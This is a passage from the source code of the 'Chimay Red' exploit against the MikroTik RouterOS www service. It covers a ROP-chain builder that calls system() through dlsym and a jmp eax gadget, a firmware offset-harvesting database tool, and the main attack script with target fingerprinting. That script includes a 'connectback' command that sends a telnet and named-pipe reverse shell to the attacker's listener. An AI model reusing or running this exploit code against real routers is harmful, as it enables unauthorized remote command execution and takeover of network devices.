| :return: 138 | """ 139 | if isinstance(modpaths, (tuple, list)): 140 | filter_list = list() 141 | for path in modpaths: 142 | filter_list.append(tracemalloc.Filter(True, path)) 143 | snapshot = snapshot.filter_traces(filter_list) 144 | else: 145 | snapshot = snapshot.filter_traces(( 146 | tracemalloc.Filter(False, ""), 147 | tracemalloc.Filter(False, ""), 148 | tracemalloc.Filter(False, ""), 149 | )) 150 | top_stats = snapshot.statistics(key_type) 151 | 152 | print("Top {} lines".format(limit)) 153 | for index, stat in enumerate(top_stats[:limit], 1): 154 | frame = stat.traceback[0] 155 | # replace "/path/to/module/file.py" with "module/file.py" 156 | filename = "/".join(frame.filename.split("/")[-2:]) 157 | print("#%s: %s:%s: %.1f KiB" % (index, filename, frame.lineno, stat.size / 1024)) 158 | line = linecache.getline(frame.filename, frame.lineno).strip() 159 | if line: 160 | print(' {}'.format(line)) 161 | 162 | other = top_stats[limit:] 163 | if other: 164 | size = sum(stat.size for stat in other) 165 | print("%s other: %.1f KiB" % (len(other), size / 1024)) 166 | total = sum(stat.size for stat in top_stats) 167 | print("Total allocated size: %.1f KiB" % (total / 1024)) 168 | 169 | 170 | def parse_mndp(data): 171 | """ 172 | 173 | :param data: 174 | :return: 175 | """ 176 | entry = dict() 177 | names = ('version', 'ttl', 'checksum') 178 | for idx, val in enumerate(struct.unpack_from('!BBH', data)): 179 | entry[names[idx]] = val 180 | 181 | pos = 4 182 | while pos + 4 < len(data): 183 | msgid, length = struct.unpack_from('!HH', data, pos) 184 | pos += 4 185 | 186 | # MAC 187 | if msgid == 1: 188 | (mac,) = struct.unpack_from('6s', data, pos) 189 | entry['mac'] = "%02x:%02x:%02x:%02x:%02x:%02x" % tuple(x for x in mac) 190 | 191 | # Identity 192 | elif msgid == 5: 193 | entry['id'] = data[pos:pos + length] 194 | 195 | # Platform 196 | elif msgid == 8: 197 | entry['platform'] = data[pos:pos + length] 198 | 199 | # Version 200 | elif msgid == 7: 201 | entry['version'] = data[pos:pos + length] 202 | 203 | # uptime? 204 | elif msgid == 10: 205 | (uptime,) = struct.unpack_from(' str: 15 | arch = context.arch 16 | 17 | convert = { 18 | 'i386': 'i386', 19 | 'amd64': 'i386:x86-64', 20 | 'thumb': 'arm', 21 | 'ia64': 'ia64-elf64', 22 | 'mips64': 'mips' 23 | } 24 | 25 | if arch in convert: 26 | arch = convert[arch] 27 | 28 | return arch 29 | 30 | 31 | asm._bfdarch = _bfdarch_patch 32 | 33 | 34 | class MikroROP(object): 35 | """ 36 | MikroROP class 37 | """ 38 | def __init__(self, binary: ELF, command=None): 39 | default_command = "/bin/touch /tmp/foobar-" + "".join(random.sample(string.ascii_letters, 5)) 40 | 41 | self._chain = None 42 | self._offsets = None 43 | self._command = command or default_command 44 | 45 | with context.local(): 46 | context.log_level = "WARNING" # Suppress ELF metadata print from pwntools 47 | if isinstance(binary, str): 48 | if os.path.isfile(binary): 49 | self.binary = binary = ELF(binary) 50 | if not isinstance(binary, ELF): 51 | self.binary = binary = ELF.from_bytes(b"\x90" * 262144, vma=0x8048000) 52 | self.rop = ROP([binary]) 53 | else: 54 | self.binary = binary 55 | context.binary = self.binary.path 56 | self.rop = ROP([binary]) 57 | context.arch = _bfdarch_patch() 58 | self.context = context 59 | 60 | self.build_offsets() 61 | 62 | def get_pthread_stacksize(self, lookahead=100) -> hex: 63 | """ 64 | 65 | :param lookahead: 66 | :return: 67 | """ 68 | thread_size = None 69 | 70 | address = self.binary.symbols[b"main"] 71 | disasm = self.binary.disasm(address, lookahead).split("\n") 72 | 73 | for num, line in zip(range(len(disasm)), disasm): 74 | if re.search(r"(e8 .* ff ff)", line): 75 | thread_attr = disasm[num - 2] 76 | if "push" in thread_attr: 77 | thread_size = thread_attr.partition("push")[-1].strip() 78 | break 79 | 80 | if not thread_size: 81 | return False 82 | 83 | return thread_size 84 | 85 | # TODO: Update mmips symbol fetching 86 | def get_plt_symbols(self, architecture: str) -> dict: 87 | plt_symbols = dict() 88 | 89 | try: 90 | if architecture is "x86" or "mips": 91 | for sym_name in (b"strncpy", b"dlsym"): 92 | plt_symbols[sym_name.decode()] = self.binary.plt[sym_name] 93 | except KeyError: 94 | log.critical("Unkown error occured during fetching of symbols for " + architecture) 95 | raise 96 | 97 | return plt_symbols 98 | 99 | def generate_executable_segments(self) -> list: 100 | """ 101 | 102 | :return: 103 | """ 104 | executable_segments = list() 105 | 106 | for segment in self.binary.executable_segments: 107 | low = segment.header.p_vaddr 108 | high = segment.header.p_memsz + low 109 | 110 | if low or high: # if not ZERO 111 | executable_segments.append((low, high)) 112 | 113 | if not executable_segments: 114 | raise RuntimeError("Could not locate any executable segments in binary") 115 | 116 | return executable_segments 117 | 118 | def generate_writeable_segments(self) -> list: 119 | """ 120 | 121 | :return: 122 | """ 123 | writeable_segments = list() 124 | 125 | for segment in self.binary.writable_segments: 126 | low = segment.header.p_vaddr 127 | high = segment.header.p_memsz + low 128 | 129 | if low or high: # if not ZERO 130 | writeable_segments.append((low, high)) 131 | 132 | if not writeable_segments: 133 | raise RuntimeError("Could not locate any writeable segments in binary") 134 | 135 | return writeable_segments 136 | 137 | def generate_jmp_eax_gadget(self) -> int: 138 | """ 139 | 140 | :return: 141 | """ 142 | jmp_eax_re = re.compile(r"(.*jmp *eax)") 143 | 144 | for rx_segment_low, rx_segment_high in self.generate_executable_segments(): 145 | for line in self.binary.disasm(rx_segment_low, rx_segment_high).split("\n"): 146 | if jmp_eax_re.search(line): 147 | return int(str(line.split(":")[0].strip()), 16) 148 | 149 | def generate_stackpivots(self, architecture): 150 | """ 151 | 152 | :param architecture: 153 | :return 154 | """ 155 | # TODO 156 | arch_pivots = { 157 | "x86": { 158 | "pivot3ret": self.rop.search(regs=["esi", "edi", "ebp"]), 159 | "pivot2ret": self.rop.search(regs=["ebx", "ebp"]), 160 | "pivot1ret": self.rop.search(regs=["ebp"]) 161 | }, 162 | # "mips": { 163 | # "pivot3ret": self.rop.search(regs=["esi", "edi", "ebp"]), 164 | # "pivot2ret": self.rop.search(regs=["ebx", "ebp"]), 165 | # "pivot1ret": self.rop.search(regs=["ebp"]) 166 | # }, 167 | # "arm": { 168 | # "pivot3ret": self.rop.search(regs=["esi", "edi", "ebp"]), 169 | # "pivot2ret": self.rop.search(regs=["ebx", "ebp"]), 170 | # "pivot1ret": self.rop.search(regs=["ebp"]) 171 | # } 172 | } 173 | 174 | stackpivots = arch_pivots.get(architecture) 175 | 176 | if not stackpivots: 177 | return False 178 | 179 | return stackpivots 180 | 181 | def generate_string_chunks(self, query: str): 182 | """ 183 | 184 | :param query: 185 | :return: 186 | """ 187 | return [[address for address in char][0] for char in [self.binary.search(char) for char in query + "\x00"]] 188 | 189 | def generate_ascii_chunks(self): 190 | """ 191 | 192 | :return: 193 | """ 194 | ascii_chunks = dict() 195 | for char in string.printable + "\x00": 196 | ascii_chunks[char] = [address for address in self.binary.search(char)][0] or None 197 | return ascii_chunks 198 | 199 | def build_offsets(self): 200 | """ 201 | 202 | :return: 203 | """ 204 | offsets = { 205 | "size": self.binary.data.__len__(), 206 | "base": self.binary.address, 207 | "thread_size": self.get_pthread_stacksize(), 208 | "segments": { 209 | "executable_segments": self.generate_executable_segments(), 210 | "writeable_segments": self.generate_writeable_segments() 211 | }, 212 | "strings": { 213 | "ascii_chunks": self.generate_ascii_chunks(), 214 | "system": self.generate_writeable_segments()[1][0], 215 | "cmd": (self.generate_writeable_segments()[1][0] + (self.binary.bits >> 1)), 216 | }, 217 | "gadgets": { 218 | "jmp_eax": self.generate_jmp_eax_gadget(), 219 | "pivot3ret": self.rop.search(regs=["esi", "edi", "ebp"]), 220 | "pivot2ret": self.rop.search(regs=["ebx", "ebp"]), 221 | "pivot1ret": self.rop.search(regs=["ebp"]), 222 | }, 223 | "plt": { 224 | "strncpy": self.get_plt_symbols(self.binary.arch)["strncpy"], 225 | "dlsym": self.get_plt_symbols(self.binary.arch)["dlsym"] 226 | } 227 | } 228 | self._offsets = namedtuple("offsets", sorted(offsets))(**offsets) 229 | 230 | return True 231 | 232 | def build_ropchain(self, offsets=None): 233 | """ 234 | Command Eg. "ls -la" 235 | 236 | system_chunks = [134512899, 134513152, 134512899, 134512854, 134514868, 134514240, 134512693] 237 | ("s", "y", "s", "t", "e", "m", "\x00") 238 | cmd_chunks = [134512899, 134513152, 134512899, 134512854, 134514868, 134514240, 134512693] 239 | ("l", "s", " ", "-", "l", "a", "\x00") 240 | 241 | Psuedocode: 242 | ----------------------------- 243 | char_size = 1 244 | char_pointer = 0 245 | 246 | for address in cmd_chunks: 247 | rop.call(, args=( + char_pointer, address, char_size)) 248 | char_pointer += 1 249 | 250 | |<<<< rop.call(, args=(0, "system")) 251 | | 252 | | eax = resultant pointer of dlsym() 253 | | 254 | |>>>> rop.call(, args=()) 255 | 256 | ----------------------------- 257 | """ 258 | 259 | char_size = 1 260 | cmd_chunks = list() 261 | system_chunks = list() 262 | 263 | if offsets: 264 | self._offsets = offsets 265 | for gadget_name, gadget in self.offsets.gadgets.items(): 266 | if "pivot" in gadget_name: 267 | self.binary.asm(gadget.address, "; ".join(gadget.insns)) 268 | self.binary.save("/tmp/chimay_red.elf") 269 | 270 | with context.local(): 271 | context.log_level = "WARNING" # Suppress ELF metadata print from pwntools 272 | self.rop = ROP([ELF("/tmp/chimay_red.elf")]) 273 | 274 | ascii_chunks = self.offsets.strings.get("ascii_chunks") 275 | if not ascii_chunks: 276 | log.critical("Offsets are currently not built!") 277 | 278 | for char in "system" + "\x00": 279 | if ascii_chunks.get(char): 280 | system_chunks.append(ascii_chunks[char]) 281 | else: 282 | log.critical("Unable to locate enough readable characters in the binary to craft system chunks") 283 | 284 | for char in self.command + "\x00": 285 | if ascii_chunks.get(char): 286 | cmd_chunks.append(ascii_chunks[char]) 287 | else: 288 | log.critical("Unable to locate enough readable characters in the binary to craft desired command") 289 | 290 | for length, address in zip(range(len(system_chunks)), system_chunks): 291 | self.rop.call(self.offsets.plt.get("strncpy"), 292 | [ 293 | self.offsets.strings.get("system") + length, 294 | address, 295 | char_size 296 | ]) 297 | # print("EXPLOIT STAGE 1 (SYSTEM CHUNKS): ", hexlify(self.rop.chain())) 298 | 299 | for length, address in zip(range(len(cmd_chunks)), cmd_chunks): 300 | self.rop.call(self.offsets.plt.get("strncpy"), 301 | [ 302 | self.offsets.strings.get("cmd") + length, 303 | address, 304 | char_size 305 | ]) 306 | # print("EXPLOIT STAGE 2 (CMD CHUNKS): ", hexlify(self.rop.chain())) 307 | 308 | self.rop.call(self.offsets.plt.get("dlsym"), [0, self.offsets.strings.get("system")]) 309 | # print("EXPLOIT STAGE 3 (SYSTEM CHUNKS): ", hexlify(self.rop.chain())) 310 | 311 | self.rop.call(self.offsets.gadgets.get("jmp_eax"), [self.offsets.strings.get("cmd")]) 312 | # print("EXPLOIT 4: ", hexlify(self.rop.chain())) 313 | 314 | self._chain = self.rop.chain() 315 | 316 | @property 317 | def command(self): 318 | """ The command property """ 319 | return self._command 320 | 321 | @command.setter 322 | def command(self, value): 323 | self._command = value 324 | 325 | @property 326 | def offsets(self): 327 | """ The offsets property """ 328 | return self._offsets 329 | 330 | @offsets.setter 331 | def offsets(self, value): 332 | self._offsets = value 333 | 334 | @property 335 | def chain(self): 336 | """ The ropchain property """ 337 | return self._chain 338 | 339 | @chain.setter 340 | def chain(self, value): 341 | self._chain = value 342 | -------------------------------------------------------------------------------- /mikrodb.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | 4 | """ generator and helper for harvesting offsets from mass quantities 5 | of MikroTik www binaries accross all versions and architectures. 6 | """ 7 | import argparse 8 | import os 9 | import pickle 10 | import sqlite3 11 | import warnings 12 | from collections.abc import MutableMapping 13 | from hashlib import sha256 14 | 15 | from lib import defines 16 | from lib.rop import MikroROP 17 | from lib.thirdparty.PySquashfsImage import SquashFsImage 18 | from lib.utils import check_squashfs_offset, find_files, write_to_file, print_progress 19 | from lib.versions import dump_available_versions, yield_ros_images 20 | 21 | 22 | class PrintHelpException(Exception): 23 | def __init__(self, exception): 24 | super().__init__(exception) 25 | warnings.warn(str(exception)) 26 | raise SystemExit(PARSER.print_help()) 27 | 28 | 29 | class MikroBase(object): 30 | def __init__(self, *args, **kw): 31 | self._protocol = kw.get("protocol", pickle.HIGHEST_PROTOCOL) 32 | 33 | def dumps(self, value): 34 | """Serializes object `value`.""" 35 | # serialize anything but ASCII strings 36 | return pickle.dumps(value, protocol=self._protocol) 37 | 38 | @staticmethod 39 | def loads(value): 40 | """Deserializes object `value`.""" 41 | return pickle.loads(value) 42 | 43 | 44 | # TODO: change table name to mikrodb from legacy name 45 | class MikroDb(MutableMapping, MikroBase): 46 | """Model mapping for sqlite3 database""" 47 | 48 | def __init__(self, engine, **kw): 49 | super(MikroDb, self).__init__(engine, **kw) 50 | 51 | if not isinstance(engine, str): 52 | raise TypeError("engine URI expecting type str, got {0}".format(type(engine))) 53 | elif engine.startswith("lite://"): 54 | self._engine = engine.split("://")[1] 55 | else: 56 | self._engine = engine 57 | 58 | self._store = sqlite3.connect(self._engine) 59 | self._store.text_factory = defines.NativeTextFactory 60 | 61 | self._cursor = self._store.cursor() 62 | self._cursor.execute( 63 | """ 64 | CREATE TABLE IF NOT EXISTS wwwdb ( 65 | key TEXT PRIMARY KEY NOT NULL, 66 | value TEXT NOT NULL 67 | ) 68 | """ 69 | ) 70 | self._store.commit() 71 | 72 | def __getitem__(self, key): 73 | self._cursor.execute( 74 | 'SELECT value FROM wwwdb WHERE key=?', (self.dumps(key),)) 75 | row = self._cursor.fetchone() 76 | if row: 77 | return self.loads(row[0]) 78 | else: 79 | raise KeyError(key) 80 | 81 | def __setitem__(self, k, v): 82 | self._cursor.execute( 83 | 'INSERT OR REPLACE INTO wwwdb VALUES (?, ?)', 84 | (self.dumps(k), self.dumps(v)) 85 | ) 86 | self._store.commit() 87 | 88 | def __delitem__(self, key): 89 | self._cursor.execute( 90 | 'DELETE FROM wwwdb WHERE key=?', (self.dumps(key),)) 91 | self._store.commit() 92 | 93 | def __iter__(self): 94 | for row in self._store.execute('SELECT key FROM wwwdb'): 95 | yield self.loads(row[0]) 96 | 97 | def __len__(self): 98 | return int(self._store.execute('SELECT COUNT(*) FROM wwwdb').fetchone()[0]) 99 | 100 | def update_nested_key(self, root_key: str, sub_key: str, data: '*') -> bool: 101 | """ 102 | 103 | :param root_key: 104 | :param sub_key: 105 | :param data: 106 | :return: 107 | """ 108 | if not all(isinstance(var, str) for var in (root_key, sub_key)): 109 | raise TypeError("root_key, sub_key expecting type str, got {0},{1}".format(type(root_key), type(sub_key))) 110 | elif root_key not in self: 111 | raise IndexError("unable to locate the root key in the dictionary object!") 112 | 113 | current = self[root_key] 114 | 115 | if isinstance(data, dict) and bool(data): 116 | for k, v in data.items(): 117 | current[sub_key][k] = v 118 | else: 119 | current[sub_key] = data 120 | 121 | self[root_key] = current 122 | 123 | return True 124 | 125 | 126 | # TODO: Add local version builder for existing `storage` 127 | class MikroDbBuilder(MikroDb): 128 | def __init__(self, *args, **kw): 129 | super(MikroDbBuilder, self).__init__(*args, **kw) 130 | 131 | self._verbose = kw.get("verbose", False) 132 | self._versions = kw.get("versions", False) 133 | self._architectures = kw.get("architectures", defines.ARCHS) 134 | 135 | self._available_versions = dict() 136 | 137 | if all((self._architectures, self._versions)): 138 | if not all(isinstance(var, (tuple, list)) for var in (self._architectures, self._versions)): 139 | raise TypeError("architectures, versions expecting type(s) (tuple, list), got {0},{1}".format( 140 | type(self._architectures), type(self._versions) 141 | )) 142 | 143 | for architecture in self._architectures: 144 | self._available_versions[architecture] = self._versions 145 | 146 | if not os.path.exists(defines.BASE_STORAGE_PATH): 147 | os.makedirs(defines.BASE_STORAGE_PATH) 148 | 149 | @staticmethod 150 | def generate_base_dir(architecture: str, root: str, create_dirs=True): 151 | """ 152 | 153 | :param architecture: 154 | :param root: 155 | :param create_dirs: 156 | :return: 157 | """ 158 | base_dir = os.path.join( 159 | defines.BASE_STORAGE_PATH, 160 | root, 161 | architecture 162 | ) 163 | 164 | if create_dirs: 165 | if not os.path.exists(base_dir): 166 | os.makedirs(base_dir) 167 | 168 | return base_dir 169 | 170 | def prepare_versions(self): 171 | """ 172 | 173 | :return: 174 | """ 175 | self._available_versions = dump_available_versions( 176 | self._architectures, verbose=self._verbose 177 | ) 178 | 179 | return self._available_versions 180 | 181 | def populate_npk_storage(self): 182 | """ 183 | 184 | :return: 185 | """ 186 | if not self._available_versions: 187 | self.prepare_versions() 188 | 189 | for architecture, versions in self._available_versions.items(): 190 | if not versions: 191 | continue 192 | 193 | version_cursor = int() 194 | architecture_npk_dir = self.generate_base_dir(architecture, "npk") 195 | 196 | for firmware in yield_ros_images(architecture, versions, verbose=self._verbose): 197 | filepath = os.path.join( 198 | architecture_npk_dir, 199 | defines.ROS_NPK_FMT.format(architecture, versions[version_cursor]) 200 | ) 201 | 202 | write_to_file(firmware.content, filepath) 203 | 204 | sha256hash = sha256(firmware.content).hexdigest() 205 | 206 | write_to_file("{}".format(sha256hash).encode(), 207 | "{}.sha256".format(filepath)) 208 | 209 | version_cursor += 1 210 | 211 | return True 212 | 213 | def populate_npk_table(self, tablename="npk"): 214 | """ 215 | 216 | :param tablename: 217 | :return: 218 | """ 219 | if not self._available_versions: 220 | self.prepare_versions() 221 | 222 | if tablename not in self: 223 | self[tablename] = dict() 224 | 225 | for architecture, versions in self._available_versions.items(): 226 | if not versions: 227 | continue 228 | 229 | npk_temptable = dict() 230 | 231 | if architecture not in self[tablename]: 232 | self.update_nested_key(tablename, architecture, dict()) 233 | 234 | for version in versions: 235 | for shafile in find_files( 236 | defines.BASE_STORAGE_PATH, 237 | defines.ROS_NPK_SHA256_FMT.format(architecture, version) 238 | ): 239 | with open(shafile) as shafile_fd: 240 | sha256hash = shafile_fd.read() 241 | shafile_fd.close() 242 | 243 | npk_temptable[version] = {"sha256hash": sha256hash} 244 | 245 | self.update_nested_key(tablename, architecture, npk_temptable) 246 | 247 | return True 248 | 249 | def populate_www_storage(self): 250 | """ 251 | 252 | :return: 253 | """ 254 | if not self._available_versions: 255 | self.prepare_versions() 256 | 257 | for architecture, versions in self._available_versions.items(): 258 | if not versions: 259 | continue 260 | 261 | architecture_www_dir = self.generate_base_dir(architecture, "www") 262 | 263 | for version in versions: 264 | for firmware_path in find_files( 265 | defines.BASE_STORAGE_PATH, 266 | defines.ROS_NPK_FMT.format(architecture, version) 267 | ): 268 | filepath = os.path.join( 269 | architecture_www_dir, 270 | defines.WWW_BIN_FMT.format(architecture, version) 271 | ) 272 | 273 | offset = defines.SQUASHFS_OFFSET if architecture != "tile" else defines.SQUASHFS_TILE_OFFSET 274 | if not check_squashfs_offset(firmware_path, offset=offset): 275 | raise RuntimeWarning("Unaccounted error occured during squashfs offset validation") 276 | else: 277 | squashfs = SquashFsImage(firmware_path, offset=offset) 278 | 279 | www_search = [ 280 | www_bin.getContent() for www_bin in squashfs.root.findAll() 281 | if www_bin.name == b"www" and www_bin.hasAttribute(0o100000) 282 | ] 283 | 284 | if not www_search: 285 | raise RuntimeWarning("Could not locate www binary for npk: {}".format( 286 | firmware_path.split("/")[-1])) 287 | 288 | write_to_file(www_search[0], filepath) 289 | 290 | sha256hash = sha256(www_search[0]).hexdigest() 291 | 292 | write_to_file("{}".format(sha256hash).encode(), 293 | "{}.sha256".format(filepath)) 294 | 295 | return True 296 | 297 | def populate_www_table(self, tablename="www"): 298 | """ 299 | 300 | :param tablename: 301 | :return: 302 | """ 303 | if not self._available_versions: 304 | self.prepare_versions() 305 | 306 | if tablename not in self: 307 | self[tablename] = dict() 308 | 309 | for architecture, versions in self._available_versions.items(): 310 | if not versions: 311 | continue 312 | 313 | www_temptable = dict() 314 | 315 | if architecture not in self[tablename]: 316 | self.update_nested_key(tablename, architecture, dict()) 317 | 318 | for version in versions: 319 | for shafile in find_files( 320 | defines.BASE_STORAGE_PATH, 321 | defines.WWW_BIN_SHA256_FMT.format(architecture, version) 322 | ): 323 | with open(shafile) as shafile_fd: 324 | sha256hash = shafile_fd.read() 325 | shafile_fd.close() 326 | 327 | www_temptable[version] = {"sha256hash": sha256hash} 328 | 329 | self.update_nested_key(tablename, architecture, www_temptable) 330 | 331 | return True 332 | 333 | def populate_www_offsets(self, tablename="www"): 334 | """ 335 | 336 | :param tablename: 337 | :return: 338 | """ 339 | for architecture, versions in self._available_versions.items(): 340 | if "x86" not in architecture: # LOCK to x86 for now 341 | print("Skipping architecture {0} because this version works with x86 only currently".format( 342 | architecture)) 343 | else: 344 | temp_table = self["www"][architecture] 345 | 346 | with print_progress("Generating offsets for version") as progress: 347 | for version in versions: 348 | progress.status(version) 349 | for firmware_path in find_files( 350 | defines.BASE_STORAGE_PATH, 351 | defines.WWW_BIN_FMT.format(architecture, version) 352 | ): 353 | ropper = MikroROP(firmware_path) 354 | temp_table[version]["offsets"] = ropper.offsets._asdict() 355 | 356 | progress.success() 357 | self.update_nested_key(tablename, architecture, temp_table) 358 | 359 | return True 360 | 361 | def generate_database(self, **kw): 362 | """ 363 | 364 | :param kw: 365 | :return: 366 | """ 367 | generate_npk = kw.get("generate_npk", True) 368 | generate_www = kw.get("generate_www", True) 369 | generate_offsets = kw.get("generate_offsets", True) 370 | 371 | if generate_npk: 372 | self.populate_npk_storage() 373 | self.populate_npk_table() 374 | if generate_www: 375 | self.populate_www_storage() 376 | self.populate_www_table() 377 | if generate_offsets: 378 | self.populate_www_offsets() 379 | 380 | return True 381 | 382 | 383 | def main(verbose=False, architectures=None, versions=None): 384 | """ mikrodb.py entrypoint """ 385 | if architectures is None: 386 | architectures = defines.SUPPORTED_ARCHS 387 | 388 | engine = "lite://mikro.db" 389 | builder = MikroDbBuilder( 390 | engine, 391 | verbose=verbose, 392 | versions=versions, 393 | architectures=architectures) 394 | 395 | return builder.generate_database() 396 | 397 | 398 | if __name__ == "__main__": 399 | PARSER = argparse.ArgumentParser( 400 | formatter_class=argparse.RawDescriptionHelpFormatter, 401 | epilog="""\n 402 | Example: 403 | ./mikrodb.py --architectures="x86" --versions="6.36.4,6.38.4" 404 | """) 405 | 406 | PARSER.add_argument("-v", "--verbose", 407 | action="store_true", 408 | default=0, 409 | help="Verbosity mode") 410 | 411 | PARSER.add_argument("--architectures", 412 | action="store", 413 | required=False, 414 | help='architectures to build for. Eg. --architectures="x86" or "x86,mmips"') 415 | 416 | PARSER.add_argument("--versions", 417 | action="store", 418 | required=False, 419 | help='versions to build for. Eg. --versions="6.38.4" or "6.36.4,6.38.4"') 420 | ARGS = PARSER.parse_args() 421 | 422 | is_verbose = True if ARGS.verbose else False 423 | 424 | try: 425 | if not ARGS.architectures: 426 | ARGS.architectures = defines.SUPPORTED_ARCHS[0] 427 | raise RuntimeError("No architecture specified, defaulting to ({})".format(defines.SUPPORTED_ARCHS[0])) 428 | 429 | architectures = list() 430 | for architecture in ARGS.architectures.split(","): 431 | if architecture not in defines.SUPPORTED_ARCHS: 432 | raise RuntimeError("Unsupported architecture specified: {0}".format(architecture)) 433 | else: 434 | architectures.append(architecture) 435 | 436 | versions = list() 437 | if ARGS.versions: 438 | for version in ARGS.versions.split(","): 439 | if int(version.split(".")[0]) < 6: 440 | raise RuntimeError("version cannot be outside of the 6.x range") 441 | else: 442 | versions.append(version) 443 | except RuntimeError as exc: 444 | raise PrintHelpException(exc) 445 | else: 446 | raise SystemExit(main(verbose=is_verbose, architectures=architectures, versions=versions)) 447 | -------------------------------------------------------------------------------- /chimay_red.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | 4 | """ 5 | MikroTik www service exploit by Dayton Pidhirney @ Seekintoo LTD. 6 | 7 | TODO: Implement --leakrounds and missing associated logic 8 | """ 9 | 10 | __author__ = "Dayton Pidhirney " 11 | __version__ = "0.0.1" 12 | __license__ = "MIT" 13 | 14 | import argparse 15 | import os 16 | import random 17 | import re 18 | import socket 19 | import time 20 | import typing 21 | from collections import namedtuple 22 | 23 | from pwn import log, context, listen 24 | 25 | import mikrodb 26 | from lib.defines import ( 27 | VECTORS, TARGET, PROFILING, CWD, TRACEFILES, PORTS, SUPPORTED_ARCHS) 28 | from lib.gdb_helper import run_new_remote_gdbserver, attach_gdb_server 29 | from lib.leaker import MikroLeaker 30 | from lib.rop import MikroROP 31 | from lib.utils import ( 32 | mndp_scan, 33 | create_socket, 34 | craft_post_header, 35 | get_system_routes, 36 | check_cidr_overlap) 37 | from lib.versions import ros_version_ranges 38 | 39 | if PROFILING: 40 | import cProfile 41 | import tracemalloc 42 | from lib.utils import display_top 43 | 44 | 45 | class PrintHelpException(Exception): 46 | def __init__(self, exception): 47 | super().__init__(exception) 48 | log.critical(str(exception)) 49 | raise SystemExit(PARSER.print_help()) 50 | 51 | 52 | def connectable(addr) -> bool: 53 | """ 54 | 55 | :param addr: 56 | :return: 57 | """ 58 | sock = None 59 | is_connectable = False 60 | with log.progress("Testing target connection") as progress: 61 | try: 62 | sock = create_socket(addr, 80) 63 | except ConnectionAbortedError: 64 | progress.failure("FAILED!") 65 | else: 66 | is_connectable = True 67 | progress.success("SUCCESS!") 68 | finally: 69 | if sock: 70 | sock.close() 71 | 72 | return is_connectable 73 | 74 | 75 | def exploitable(version: str) -> bool: 76 | """ 77 | 78 | :param version: 79 | :return: 80 | """ 81 | is_exploitable = True 82 | supported_versions = ros_version_ranges(()) 83 | 84 | versions = [int(v) for v in version.split(".")] 85 | if versions[0] != supported_versions.maximum_major: 86 | is_exploitable = False 87 | elif versions[1] > supported_versions.maximum_minor: 88 | is_exploitable = False 89 | elif len(versions) == 3: 90 | if versions[2] > supported_versions.maximum_build: 91 | is_exploitable = False 92 | 93 | return is_exploitable 94 | 95 | 96 | def get_remote_architecture(addr): 97 | """ 98 | 99 | :param addr: 100 | :return: 101 | """ 102 | if not isinstance(addr, str): 103 | raise TypeError("expected type str for addr, got {0}".format(type(addr))) 104 | 105 | architecture = None 106 | 107 | mndp_scanner = mndp_scan() 108 | with log.progress("Discovering remote target architecture | CTRL+C to skip") as progress: 109 | try: 110 | while True: 111 | beacon = next(mndp_scanner) 112 | if beacon.get(addr) and beacon[addr].get("hardware"): 113 | architecture = beacon[addr]["hardware"].decode() 114 | break 115 | except StopIteration as e: 116 | progress.failure("skipped") 117 | raise e 118 | else: 119 | progress.success(architecture) 120 | 121 | return architecture 122 | 123 | 124 | def get_remote_version() -> [typing.Union[bytes, str]]: 125 | """ 126 | 127 | :return: 128 | """ 129 | 130 | cnx = None 131 | port = None 132 | version = None 133 | 134 | with log.progress("Discovering remote target version") as progress: 135 | for portnum in PORTS.values(): 136 | try: 137 | if isinstance(portnum, int): 138 | cnx = create_socket(TARGET.rhost, portnum) 139 | elif isinstance(portnum, (tuple, list)): 140 | for subport in portnum: 141 | cnx = create_socket(TARGET.rhost, subport) 142 | break 143 | except ConnectionError: 144 | continue 145 | else: 146 | port = portnum 147 | break 148 | 149 | if port in PORTS["HTTP_PORT"]: # HTTP 150 | version_rec = re.compile(r".*RouterOS.*v(\d+.\d+.\d+|\d.\d+)") 151 | cnx.send(b"GET / HTTP/1.1\r\n\r\n"), tuple(map(str, cnx.read(65535))) # read garbage for continuation 152 | elif port == PORTS["FTP_PORT"] or PORTS["TELNET_PORT"]: # FTP/TELNET 153 | version_rec = re.compile(r"\(MikroTik (\d.\d+.\d|\d.\d+)\)") 154 | elif port == PORTS["SSH_PORT"]: # SSH 155 | raise NotImplementedError("No know method of version retreival known for ROSSSH") 156 | else: 157 | raise NotImplementedError("No known method of version retreival known for port: " + str(port)) 158 | 159 | for line in cnx.read(65535).decode().split(cnx.newline.decode()): 160 | version_match = version_rec.search(line) 161 | if version_match: 162 | version = version_match.groups()[0] 163 | progress.success(version) 164 | break 165 | 166 | if not version: 167 | progress.failure() 168 | 169 | cnx.close() 170 | 171 | return version 172 | 173 | 174 | class Command(object): 175 | """ 176 | ChimayRed Command Class 177 | """ 178 | 179 | __commands__ = ( 180 | "bindshell", 181 | "connectback", 182 | "download_and_exe", 183 | "ssl_download_and_exe", 184 | "write_devel", 185 | "write_devel_read_userfile", 186 | "custom_shellcode", 187 | "custom_shell_command", 188 | "do_crash" 189 | ) 190 | 191 | def __init__(self, *args, command="default"): 192 | (getattr(self, command))(*args) 193 | 194 | @staticmethod 195 | def bindshell(vector, *args): 196 | log.error("Command: bindshell currently not implemented in this version") 197 | 198 | @staticmethod 199 | def connectback(vector, *args): 200 | """ 201 | 202 | :param vector: 203 | :param args: 204 | :return: 205 | """ 206 | # Assign a ephemeral port and check current usage 207 | port = random.randint(49152, 65535) 208 | while socket.socket().connect_ex((args[1], port)) == 1: 209 | port = random.randint(49152, 65535) 210 | 211 | listener = listen(bindaddr=args[1], port=port) 212 | revshell_cmd = "mknod /tmp/pipe p;telnet {lhost} {port}/tmp/pipe".format( 213 | lhost=args[1], port=port) 214 | 215 | throw_v6(vector, revshell_cmd) 216 | 217 | listener.wait_for_connection() 218 | log.success("Got connect back from target, exploit succeded!") 219 | 220 | return listener.interactive() 221 | 222 | @staticmethod 223 | def download_and_exe(vector, *args): 224 | log.error("Command: download_and_exe currently not implemented in this version. Coming in June!") 225 | 226 | @staticmethod 227 | def ssl_download_and_exe(vector, *args): 228 | log.error("Command: ssl_download_and_exe currently not implemented in this version. Coming in June!") 229 | 230 | @staticmethod 231 | def write_devel(vector, *args): 232 | log.error("Command: write_devel currently not implemented in this version. Coming in June!") 233 | 234 | @staticmethod 235 | def write_devel_read_userfile(vector, *args): 236 | log.error("Command: write_devel_read_userfile currently not implemented in this version. Coming in June!") 237 | 238 | @staticmethod 239 | def custom_shellcode(vector, *args): 240 | log.error("Command: 